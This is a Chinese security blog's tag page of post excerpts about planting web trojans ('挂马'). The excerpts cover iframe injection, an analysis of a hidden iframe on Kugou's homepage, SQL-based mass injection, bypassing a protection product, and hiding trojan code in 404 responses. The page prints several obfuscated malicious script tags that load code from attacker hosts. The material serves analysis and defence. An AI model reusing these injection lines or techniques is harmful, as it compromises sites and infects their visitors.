标签 ‘挂马’ 下的日志

挂马的两个新方法(11期黑客手册稿子)

2009/11/12 20:02 | 鬼仔 | 技术文章 | 7 个回复

# 鬼仔:最近比较忙,有时候更新比较少,以后会像以前一样的。

作者:lcx

这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。
阅读全文 »

Tags: ,

一种特殊的Iframe挂马的解决方法

2009/02/12 16:26 | 鬼仔 | 技术文章 | 2 个回复

# 鬼仔:这种挂马方式很早就有人提出来过,不过本文的重点在最后一段,很多时候还是直接修改配置文件方便点。

作者:Lawson

今天访问公司的一个网站,突然发现网页显示不对,右键查看HTML代码,发现iframe了一个网站的js文件,不用说,肯定被挂马了。

进入服务器,看了下文件源代码里并没有这个iframe的代码,但整个服务器的所有网站访问后代码里都自动加了这个iframe代码。
阅读全文 »

Tags: ,

c.nuclear3.c%6F%6D/css/c.js挂马完美解决方案

2008/12/16 20:52 | 鬼仔 | 技术文章 | 4 个回复

b3b69c9c-e9b3-4abd-9af0-46faed2fa803

# 鬼仔:帮Safe3 AD下。

最近挂马闹得异常的凶,黑客商业化挂马越来越普遍,用GOOGLE搜索下:/css/c.js></Script>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵, 约有498,000项,上万个网站被挂马。

木马地址不断变形<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>,但总是http://c.nuclear3.com/这段在不断变化,变种有

<Script Src=http://c.nu%63lear3.com/css/c.js></Script

<Script Src=http://c.nuclear3%2E%63om/css/c.js></Script

<Script Src=http://%63.nuclear3.com/css/c.js></Script
阅读全文 »

Tags:

友情提供一个家用防挂马小工具

2008/12/14 22:14 | 鬼仔 | 工具收集 | 1 个回复

作者:tombkeeper

说明:

这个程序的原理和今天白天“针对当前IE 7这个0day漏洞的临时解决方案”中的基本相同。不过因为是用程序实现的,所以优点是速度快,基本不占用内存,也基本不存在杀毒软件误报的问题。而且使用方便,安装后就不用再管,可以保护所有IE进程。不光对IE7、IE8有效,对IE6也有效。
阅读全文 »

Tags: , ,

酷狗音乐首页隐蔽挂马详细分析+72只马

2008/06/23 18:15 | 鬼仔 | 技术文章 | 3 个回复

作者: yimike
来源: 剑盟

近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。

详细过程如下:

1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:

<IFRAME marginWidth=0 marginHeight=0 src=”cairing.htm” frameBorder=0 width=230 scrolling=no height=327></IFRAME>

这里的cairing.htm指向的是h**p://www.kugou.com/home/cairing.htm
阅读全文 »

Tags: ,

最近比较流行的数据库挂马

2008/04/25 14:55 | 鬼仔 | 技术文章 | 8 个回复

作者:茄子宝

以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)

阅读全文 »

Tags: ,

绕过畅游巡警的网页木马防护

2008/04/25 3:09 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:前几天学校有点事,最近几天又忙着blog转换数据,再加上有点别的事,所以更新没跟上,刚才把这几天积攒的东西都发了。 :) 畅游巡警是大成天下这几天刚发布的新产品。这篇日志的前半部分是54nop的,后半部分是吴鲁加的,嘿嘿,综合了下。

————–54nop————–

畅游巡警介绍:
http://www.cnbeta.com/articles/54118.htm

绕过demo avi: (vmware录的,用klite codec pack播放)
http://bootshell.googlepages.com/SecPlugin_Bypass.rar
http://rapidshare.de/files/39213725/secplugin_bypass.rar.html

————–吴鲁加————–

畅游巡警发布测试版的第二天,在 54nop 的 Blog 的上看一篇《绕过畅游巡警的网页木马防护》,反而是有几分高兴,高兴的是:

阅读全文 »

Tags: , , ,

404挂马 + 杂谈 + AD

2008/03/19 1:41 | 鬼仔 | 技术文章 | 消灭0回复

来源:六翼刺猬的某某刺猬窝
http://www.688ip.com/dae5g45
今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;

细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:
<script src=”http://ad.shitip.com/file/da.js”></script>
貌似最近第三次看到了;

P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm

细想一下,这样是一个不错的挂马选择:

先把挂马代码插入到要返回的404信息里面;

然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;
阅读全文 »

Tags: ,